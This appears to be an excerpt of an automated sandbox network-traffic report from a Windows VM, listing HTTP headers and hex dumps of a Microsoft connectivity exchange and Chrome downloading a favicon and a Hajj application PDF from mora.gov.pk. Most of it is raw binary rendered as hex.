                                                                                                                                          2024-09-30 16:58:14 UTC4048INData Raw: 6d f0 26 1a 3f 91 77 55 7f 16 16 9f 81 ff 3d 93 bb 17 b2 08 7d 0b fe 45 f6 74 ca c0 89 48 e7 d2 ed 71 9e c5 4f 82 a5 c6 61 8d 72 f1 df c5 e7 7d ea 4e 29 3f c0 c7 2e f9 40 de 55 fd 89 e5 b3 50 42 c4 f2 15 8f ba 56 7c 4d f0 7e 84 cc be fa da 7a 60 f4 ee 77 87 da 79 3e 92 a1 0e 05 cd bd 4a 9c 87 57 5d 5a e3 ae 9a 3c 55 f7 1c ba aa f4 9a fb 73 65 80 23 7e 78 20 f5 72 28 50 48 ad 4c 90 76 39 20 0c 0b 5c a4 08 7e 86 1d 46 1b 6f db 57 f7 b0 4f 67 04 9e 0b 91 d3 6f ff 07 a2 b0 96 47 ee 03 9e 36 8b 33 11 ca f0 6d 6e b8 d3 3e 37 71 35 6a c7 32 9b 53 39 9d b6 ab c1 24 bb d9 14 c7 26 11 72 57 fe 54 d5 4d 80 c4 68 71 a8 ea 44 9e c5 bf 2f 70 f1 e0 fa 44 98 7d ff 46 86 59 02 20 aa 35 1c 95 51 70 08 a4 ba fb 32 77 e2 41 e4 91 27 4d a2 13 66 59 b0 9a 2b 75 5b b6 9d e9 c6
                                                                                                                                          Data Ascii: m&?wU=}EtHqOar}N)?.@UPBV|M~z`wy>JW]Z<Use#~x r(PHLv9 \~FoWOgoG63mn>7q5j2S9$&rWTMhqD/pD}FY 5Qp2wA'MfY+u[


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          8192.168.2.54973240.113.103.199443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:15 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 5a 62 36 62 39 2f 30 7a 55 79 55 2f 4f 5a 6d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 64 61 64 66 39 35 35 33 34 37 31 30 30 34 61 0d 0a 0d 0a
                                                                                                                                          Data Ascii: CNT 1 CON 305MS-CV: bZb6b9/0zUyU/OZm.1Context: 9dadf9553471004a
                                                                                                                                          2024-09-30 16:58:15 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                          2024-09-30 16:58:15 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 5a 62 36 62 39 2f 30 7a 55 79 55 2f 4f 5a 6d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 64 61 64 66 39 35 35 33 34 37 31 30 30 34 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 66 43 6e 7a 53 7a 79 76 51 63 39 2b 49 50 79 57 64 4a 62 61 32 41 52 75 2b 78 4b 55 37 73 39 53 69 79 34 4c 50 5a 78 71 64 79 73 71 2b 6a 73 55 44 32 63 50 4f 43 4e 69 68 79 51 49 69 5a 52 6a 37 66 59 7a 4d 6b 4c 38 61 34 54 51 4d 38 2f 32 4e 49 41 58 58 48 73 74 2f 38 59 4d 4b 66 6b 31 66 61 34 34 47 4a 76 4d 66 4a 46 4e
                                                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bZb6b9/0zUyU/OZm.2Context: 9dadf9553471004a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATfCnzSzyvQc9+IPyWdJba2ARu+xKU7s9Siy4LPZxqdysq+jsUD2cPOCNihyQIiZRj7fYzMkL8a4TQM8/2NIAXXHst/8YMKfk1fa44GJvMfJFN
                                                                                                                                          2024-09-30 16:58:15 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 62 5a 62 36 62 39 2f 30 7a 55 79 55 2f 4f 5a 6d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 64 61 64 66 39 35 35 33 34 37 31 30 30 34 61 0d 0a 0d 0a
                                                                                                                                          Data Ascii: BND 3 CON\QOS 56MS-CV: bZb6b9/0zUyU/OZm.3Context: 9dadf9553471004a
                                                                                                                                          2024-09-30 16:58:15 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                                                          2024-09-30 16:58:15 UTC58INData Raw: 4d 53 2d 43 56 3a 20 73 63 6d 62 42 54 76 36 44 30 75 4d 53 30 54 53 2b 52 4b 38 42 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                          Data Ascii: MS-CV: scmbBTv6D0uMS0TS+RK8Bw.0Payload parsing failed.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.549726203.101.184.864437768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:15 UTC604OUTGET /favicon.ico HTTP/1.1
                                                                                                                                          Host: mora.gov.pk
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: cookiesession1=678B2917984A004EC914ADEBDA66AEC6
                                                                                                                                          2024-09-30 16:58:15 UTC605INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                          Last-Modified: Tue, 05 Dec 2023 11:55:06 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "db7d5de37127da1:0"
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Xss-Protection: 1
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                          X-UA-Compatible: IE=edge,chrome=1
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:13 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 32038
                                                                                                                                          Content-Security-Policy: self
                                                                                                                                          Feature-Policy: self
                                                                                                                                          2024-09-30 16:58:15 UTC3443INData Raw: 00 00 01 00 04 00 10 10 00 00 00 00 20 00 68 04 00 00 46 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 ae 04 00 00 30 30 00 00 00 00 20 00 a8 25 00 00 56 15 00 00 40 40 00 00 00 00 20 00 28 42 00 00 fe 3a 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 d2 d1 83 cf cd cc 85 cf cc cb 85 cf cc cb 85 cf cc ca 85 ce cb ca 85 ce cb c9 85 bf bd bc b9 ce cc cb dd cd ca c9 dd cc c8 c6 dd cb c6 c4 dd cc c5 c3 db cb c5 c1 db cb c4 c1 db b6 b0 ae c1 f1 ee ec ff f4 e7 d6 ff f1 e1 ca ff ee e1 d0 ff ea e6 e4 ff e9 e5 e3 ff e9 e4 e2 ff e5 e2 e0 ff fd fb fa ff fc f9 f7 ff fb f6 f4 ff fa f4 f1 ff fa f2 ef ff f9 f1 ed ff f9 f1 ed ff df d7 d4 df f1 ee ee ff db b3 75 ff d0 9d 4c ff d0 ab 6e ff fc
                                                                                                                                          Data Ascii: hF 00 %V@@ (B:( @uLn
                                                                                                                                          2024-09-30 16:58:15 UTC41INData Raw: ba 96 ff fe fe fe ff fe fe fe ff fe fe fe ff f5 f3 f1 ff ec e8 e6 ff ec e8 e6 ff ec e8 e6 ff f5 f2 f1 ff f5 f2 f1 ff ec e7
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-09-30 16:58:15 UTC4048INData Raw: e4 ff ec e7 e4 ff ec e7 e3 ff ec e7 e2 ff ec e6 e2 ff ec e6 e2 ff ec e5 e2 ff ec e5 e1 ff eb e5 e1 ff f4 ee eb ff fc f8 f5 ff fc f7 f4 ff fb f6 f4 ff b9 b9 b9 87 00 00 00 05 e7 e7 e7 ff ff ff ff ff ed d5 b5 ff da a8 65 ff de b2 77 ff de b4 79 ff de b2 77 ff d8 c4 a8 ff ff ff ff ff ff ff ff ff ff ff fe ff f6 f4 f2 ff ed e9 e6 ff ec e8 e6 ff ec e8 e6 ff f5 f2 f1 ff f5 f2 f1 ff ec e8 e5 ff ec e7 e4 ff ec e7 e4 ff ec e7 e3 ff ec e7 e2 ff ec e6 e2 ff ec e6 e2 ff ec e5 e2 ff ec e5 e1 ff f4 ef eb ff fc f8 f5 ff fc f8 f5 ff fc f7 f4 ff bb bc bb 87 00 00 00 05 e7 e7 e7 ff ff ff ff ff ed d4 b4 ff d9 a6 61 ff dd af 72 ff d9 a6 61 ff d8 a5 5f ff d4 ba 98 ff ff ff ff ff ff ff ff ff ff ff fe ff f5 f3 f3 ff ec e9 e6 ff ec e9 e6 ff ec e8 e6 ff f5 f2 f1 ff f5 f2 f1 ff ec
                                                                                                                                          Data Ascii: ewywara_
                                                                                                                                          2024-09-30 16:58:15 UTC4048INData Raw: fa ff fd fa f9 ff e8 e5 e4 ff ef eb ea ff ee eb e9 ff ee eb e9 ff ee ea e8 ff ee e9 e7 ff ee e9 e7 ff ed e8 e6 ff ed e8 e6 ff ed e8 e5 ff e9 e4 e1 ff ec e7 e5 ff fb f5 f2 ff fb f5 f2 ff fa f4 f2 ff fb f5 f2 ff fb f5 f2 ff fa f5 f2 ff 89 87 86 9f db da da ff fc fb f9 ff fd fb f9 ff f2 e4 d0 ff d2 a0 51 ff d1 9e 4e ff d2 a2 54 ff d7 ab 66 ff d1 9e 4d ff d0 9d 4c ff d1 9e 4f ff d0 c3 af ff fd f8 f8 ff fc f8 f8 ff fd f8 f8 ff fd f9 f8 ff fc f9 f8 ff f0 e9 e6 ff ec e4 e0 ff eb e4 e0 ff eb e4 e0 ff dc d6 d2 ff d7 d4 d2 ff fd fd fc ff fe fc fc ff fe fc fb ff fe fc fb ff fd fb fa ff fd fa f9 ff f7 f5 f4 ff f5 f3 f1 ff f5 f2 f1 ff f5 f2 f0 ff f5 f1 ef ff f5 f1 ef ff f5 f1 ee ff f5 f0 ed ff f4 ef ed ff f4 ef ed ff f4 ef ed ff f7 f2 f0 ff fb f5 f3 ff fb f5 f3 ff fb
                                                                                                                                          Data Ascii: QNTfMLO
                                                                                                                                          2024-09-30 16:58:15 UTC2336INData Raw: e5 fb ec e9 e6 fd ec e8 e4 ff ec e7 e3 ff ec e6 e2 ff eb e5 e1 ff eb e4 e1 ff eb e4 e1 ff ef ea e6 fd fc f9 f7 f9 fc f8 f6 f9 fc f8 f6 fb fc f8 f6 fb fc f8 f5 fd c6 c6 c5 c3 00 00 00 0d 00 00 00 03 db db db ff ff ff ff ff ff ff ff ff f6 ea da ff da a8 68 ff da a7 64 ff db ab 6b ff df b4 7a ff da a7 64 ff d9 a6 63 ff da a9 66 ff d2 c6 b5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f1 ef ed ff ec e9 e6 ff ed e9 e6 ff ec e9 e6 ff ec e9 e6 ff ec e9 e6 ff fa f9 f7 ff fa f8 f7 ff ec e9 e6 ff ec ea e7 ff ed ea e7 ff ed ea e6 ff ec ea e7 ff ed ea e7 ff ed ea e6 ff ec ea e7 ff ec e8 e6 ff ec e7 e4 fd ec e7 e3 ff ec e6 e1 ff eb e5 e1 ff eb e4 e1 ff ef eb e6 ff fc f9 f6 ff fc f8 f5 ff fc f8 f5 ff fc f7 f5 ff fc f7 f4 ff c8 c8 c7 c3 00 00 00 0b 00
                                                                                                                                          Data Ascii: hdkzdcf
                                                                                                                                          2024-09-30 16:58:15 UTC1448INData Raw: e0 ff e2 e2 e2 bf e0 e0 e0 21 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 db db db ff e7 e7 e7 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff d5 d5 d5 ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fe fe ff fc fc fc ff fd fd fd ff fa fa fa ff f7 f7 f7 ff f3 f3 f3 ff ce ce ce ff c6 c6 c6 ff e2 e2 e2 ff e5 e5 e5 cf e3 e3 e3 21 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff
                                                                                                                                          Data Ascii: !!
                                                                                                                                          2024-09-30 16:58:15 UTC1448INData Raw: 3d 71 3d 3d 3d 71 3d 3d 3d 71 3d 3d 3d 71 3d 3d 3d 71 3d 3d 3d 71 3d 3d 3d 71 3f 3f 3f 73 10 10 10 39 ff ff ff 01 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 00 00 00 0f 3c 3c 3c 65 e4 e2 e1 ff e4 e2 e1 ff e4 e2 e1 ff e3 e1 e1 ff e3 e1 e0 ff e3 e1 e0 ff e3 e1 df ff e3 e0 df ff e2 df dd ff e2 df dd ff e2 de dc ff e2 dd db ff e1 dd da ff e1 dc da ff e1 dc d9 ff e1 db d8 ff e1 da d8 ff e1 da d8 ff e1 d9 d7 ff e1 d9 d6 ff e1 d9 d6 ff e0 d8 d5 ff e0 d8 d5 ff e0 d8 d5 ff e0 d8 d4 ff e0
                                                                                                                                          Data Ascii: =q===q===q===q===q===q===q???s9<<<e
                                                                                                                                          2024-09-30 16:58:15 UTC4048INData Raw: fa ff fd fb fa ff fd fb f9 ff fd fa f9 ff fd fa f8 ff fc f9 f7 ff fc f8 f6 ff fc f8 f6 ff fc f7 f5 ff fc f6 f4 ff fb f6 f3 ff fb f5 f3 ff fb f5 f2 ff fb f4 f1 ff fb f4 f1 ff fa f3 f0 ff fa f3 f0 ff fa f2 ef ff fa f2 ef ff fa f2 ee ff fa f2 ee ff fa f1 ee ff f9 f1 ee ff f9 f1 ed ff f9 f1 ed ff f9 f1 ed ff f9 f1 ee ff fa f1 ee ff fa f2 ee ff fa f2 ee ff 3d 3d 3d 7f d0 d0 d0 ff fc f9 f7 ff fc f9 f7 ff fc f9 f7 ff fc f9 f7 ff d1 a0 50 ff d0 9d 4b ff d0 9d 4b ff d0 9d 49 ff d1 a0 4f ff d0 9d 4a ff cf 9c 48 ff cf 9b 47 ff d0 9e 4c ff cf 9d 4a ff d1 d1 d1 ff fd f8 f5 ff fd f8 f5 ff fd f8 f5 ff fd f8 f5 ff fc f8 f5 ff fc f8 f5 ff fc f8 f4 ff fc f8 f4 ff fc f7 f4 ff fb f6 f4 ff fb f6 f4 ff fb f6 f3 ff fb f6 f3 ff bc b8 b6 ff fe fc fc ff fe fc fb ff fe fc fb ff fe
                                                                                                                                          Data Ascii: ===PKKIOJHGLJ
                                                                                                                                          2024-09-30 16:58:15 UTC4048INData Raw: fa ff fd fb f9 ff ec e7 e2 ff ec e7 e2 ff ec e7 e2 ff ec e7 e2 ff ec e6 e2 ff ec e6 e2 ff b2 ad ab ff ce cd cd ff ce cd cd ff ce cd cc ff cd cd cc ff cd cc cc ff cd cc cc ff cd cc cc ff cd cc cb ff cd cc cb ff cd cb cb ff cd cb ca ff cd cb ca ff cd cb ca ff cd ca ca ff cd ca ca ff cc ca ca ff cc ca ca ff cc ca ca ff cc ca c9 ff cc ca c9 ff cc ca c9 ff cc ca c9 ff cc ca c9 ff cc ca c9 ff cc ca c8 ff cc ca c8 ff cc ca c8 ff cc ca c8 ff cc ca c8 ff cc ca c8 ff cc ca c8 ff cc ca c9 ff cc ca c9 ff 3f 3f 3f 7f d0 d0 d0 ff fe fd fd ff fe fd fd ff fe fd fd ff fe fd fd ff d6 a5 5b ff d4 9f 51 ff d2 a0 52 ff d1 9c 4d ff de b6 7a ff d5 a4 59 ff d2 9e 4e ff d1 9d 4e ff d3 a1 53 ff d3 a1 51 ff d0 d0 d0 ff fd fd fb ff fd fd fb ff fd fd fb ff fd fd fb ff fd fc fa ff fd
                                                                                                                                          Data Ascii: ???[QRMzYNNSQ
                                                                                                                                          2024-09-30 16:58:15 UTC4048INData Raw: 86 ff da a8 65 ff d7 a2 5a ff d6 a2 5a ff d8 a5 60 ff d7 a4 5e ff d0 d0 d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff fe fe ff ff ec e9 e7 ff ed ea e7 ff ec e9 e6 ff ed e9 e6 ff ec e9 e6 ff ed e8 e6 ff ec e9 e6 ff ec e8 e6 ff fe fd fd ff fe fd fd ff ec e8 e6 ff ec e8 e6 ff ec e8 e6 ff ec e8 e6 ff ec e8 e5 ff ec e8 e4 ff ec e8 e4 ff ec e8 e5 ff ec e7 e4 ff ec e7 e4 ff ec e7 e4 ff ec e7 e3 ff ec e6 e3 ff ec e7 e2 ff ec e6 e2 ff ec e6 e2 ff ec e5 e2 ff ec e5 e2 ff ec e5 e1 ff ec e5 e0 ff fd f9 f8 ff fd f9 f7 ff fd f9 f7 ff fd f9 f6 ff fc f9 f7 ff fd f9 f5 ff fc f8 f6 ff c7 c7 c7 ff 00 00 00 0f 00 00 00 09 ff ff ff 01 d0 d0 d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff db ab 6a ff da a6 62 ff da a7 63 ff d8 a4 5e ff e2
                                                                                                                                          Data Ascii: eZZ`^jbc^


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.549736203.101.184.864437768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:17 UTC420OUTGET /SiteImage/Misc/files/HajjForm2024.pdf HTTP/1.1
                                                                                                                                          Host: mora.gov.pk
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: cookiesession1=678B2917984A004EC914ADEBDA66AEC6
                                                                                                                                          2024-09-30 16:58:17 UTC607INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: application/pdf
                                                                                                                                          Last-Modified: Thu, 06 Jun 2024 12:21:26 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "2e557edcb8da1:0"
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Xss-Protection: 1
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                          X-UA-Compatible: IE=edge,chrome=1
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:16 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 891955
                                                                                                                                          Content-Security-Policy: self
                                                                                                                                          Feature-Policy: self
                                                                                                                                          2024-09-30 16:58:17 UTC882INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 32 33 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 39 2f 4c 65 6e 67 74 68 20 32 35 31 2f 4e 20 32 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 74 90 c1 8a 83 30 10 86 5f 65 9e c0 24 13 bb b4 50 72 a8 5d 3d 94 82 18 2f 8b 78 08 6d ba 08 5d 23 31 82 fb f6 3b 46 bb b7 c2 1f 98 99 ff cb 0c 33 08 1c 52 90 3b 38 1e 59 e6 a6 3e 80 60 97 ee 3e 36 29 19 55 cb ea df c1 b2 d2 7c db 51 a9 88 f4 c1 f6 61 04 c1 17 9f 65 de 0d 27 37 37 3c a1 9c de ee c0 93 14 f6 b8 4f 78 cb ae f6 de 99 b7 6e 69 3c 75 02 8c 7d 2a 3b ba c9 df ec 18 67 3c 9d d7 83 b9 d9 25 d1 28 80 14 87 69 c9 41 ae 83 cf f6 61 a6 67 c8 ae 5f 97 97 bd 95 aa e2 b4 41 4a
                                                                                                                                          Data Ascii: %PDF-1.7%236 0 obj<</Filter/FlateDecode/First 9/Length 251/N 2/Type/ObjStm>>streamht0_e$Pr]=/xm]#1;F3R;8Y>`>6)U|Qae'77<Oxni<u}*;g<%(iAag_AJ
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 32 33 39 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 33 33 2f 4c 65 6e 67 74 68 20 32 36 31 2f 4e 20 35 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 84 cf 5d 6b 83 30 14 06 e0 bf 92 7b 91 98 0f dd 84 52 a8 6b 6d 65 d5 16 63 4b b7 b1 0b ab 87 2e a0 c9 98 19 c3 7f 3f dd 6e c6 5a 15 42 2e ce c9 39 cf 1b c2 90 83 28 43 84 52 c4 28 a2 dc 47 ac 3b 77 0c 71 0f b9 8e 8b 66 33 1c e4 0d 84 5a 19 1c 8a d3 2e 58 58 8b 0f 99 57 71 86 97 d0 14 a0 ca 5c 99 be db bc 10 b7 db 95 be e2 95 2a 74 29 d5 05 47 25 28 23 4d 6b 6f 70 92 d7 80 43 c2 b0 f8 3c 9b f6 1d 70 d6 5d 0e ce f4 41 c9 ee 35 20 e2 f5 c3 3f 65 dc af 9b cf ff ca f1 53 ba
                                                                                                                                          Data Ascii: endstreamendobj239 0 obj<</Filter/FlateDecode/First 33/Length 261/N 5/Type/ObjStm>>streamh]k0{RkmecK.?nZB.9(CR(G;wqf3Z.XXWq\*t)G%(#MkopC<p]A5 ?eS
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: 83 68 60 9b 86 f7 f3 b1 91 5a 11 67 92 09 e7 84 97 ea 4c 3e 25 76 5d 2c 97 6c 88 33 6b 1f 7c cc d6 b6 8a a5 67 22 93 1b 2f 44 03 e7 ee 6e cf c7 7a cf 4e ea e4 71 df 68 21 4b 74 e4 30 57 4a bb 23 96 e8 03 4b 06 d3 62 77 2c 99 26 09 c0 cf 97 f8 9a 26 fe de 8f 23 4a c2 b4 e1 fb b1 fa 7e 99 02 b3 90 e5 ec bd 15 7c c5 42 34 b0 8d d0 9e 8f 75 c4 e0 1d 29 be 43 e7 b4 09 99 f3 bb 06 76 d2 43 30 39 a9 c3 aa de 8f 74 42 48 a1 69 cc fb ac 8e 5a c3 12 56 61 d4 20 d1 c7 a9 98 c2 aa 98 1e 8b 59 c8 68 ed 20 4b ca d9 1a b8 1e 4b 4d e2 71 a4 e8 02 79 ce 75 fd 24 57 a7 1c 5a 84 e1 c8 80 5c 1d c5 89 8f a5 38 32 37 9c cf 83 e5 35 39 53 6e cf ff 23 58 72 32 17 f8 a6 e9 aa 3d 38 32 28 8e 26 d2 90 bf b1 ce 8e 46 96 46 1a 6a d3 11 33 86 ff e2 94 51 f1 05 41 ea ec 1a b8 c1 d0 d7
                                                                                                                                          Data Ascii: h`ZgL>%v],l3k|g"/DnzNqh!Kt0WJ#Kbw,&&#J~|B4u)CvC09tBHiZVa Yh KKMqyu$WZ\82759Sn#Xr2=82(&FFj3QA
                                                                                                                                          2024-09-30 16:58:17 UTC4048INData Raw: 64 53 04 25 b8 8e a4 90 6e 95 f0 ec 4d 3c 5f ba 7c 3b 94 1e bd c9 ed 2f 97 ac d1 dc db 31 9d 4f e7 a0 ec 65 63 74 26 9c 8c f4 1f 05 7a 60 1d f9 ea 3c 68 e0 07 5b 96 17 b3 e3 6e 24 75 29 c6 86 43 41 69 b7 9e a6 6e 70 47 8b 39 7b 87 5c 9a 48 76 9d 5c 81 5a 0d 34 3a 87 e9 0f d1 40 33 09 e1 42 57 b9 c1 2b 2b 67 4e 35 a5 91 1b b4 47 69 11 f4 f9 a3 7e 7c 34 85 7d 3b b5 af 89 cc 9d 95 8e c2 f0 83 97 99 3f 41 20 6d d5 32 44 66 3e 03 61 f2 d8 92 21 1a d8 8b 2a 23 32 8a 0b 40 43 58 b1 89 ca 63 05 a4 f6 95 1e 1c 3c 1b 9c 1f be 04 57 a7 67 0f 93 53 24 69 3d 82 fc 69 39 ce 32 e5 5a 57 74 2f d5 b5 4c 6e 0c 62 4d 91 36 f9 21 30 07 8f 0c 06 a6 49 d8 4a 34 05 c2 fd 4e 44 71 a8 91 a5 54 00 74 f9 df 51 c1 98 df ae f7 77 19 83 9f 90 b5 76 16 e4 79 28 c5 1f 0b 51 89 4c 95 2e
                                                                                                                                          Data Ascii: dS%nM<_|;/1Oect&z`<h[n$u)CAinpG9{\Hv\Z4:@3BW++gN5Gi~|4};?A m2Df>a!*#2@CXc<WgS$i=i92ZWt/LnbM6!0IJ4NDqTtQwvy(QL.
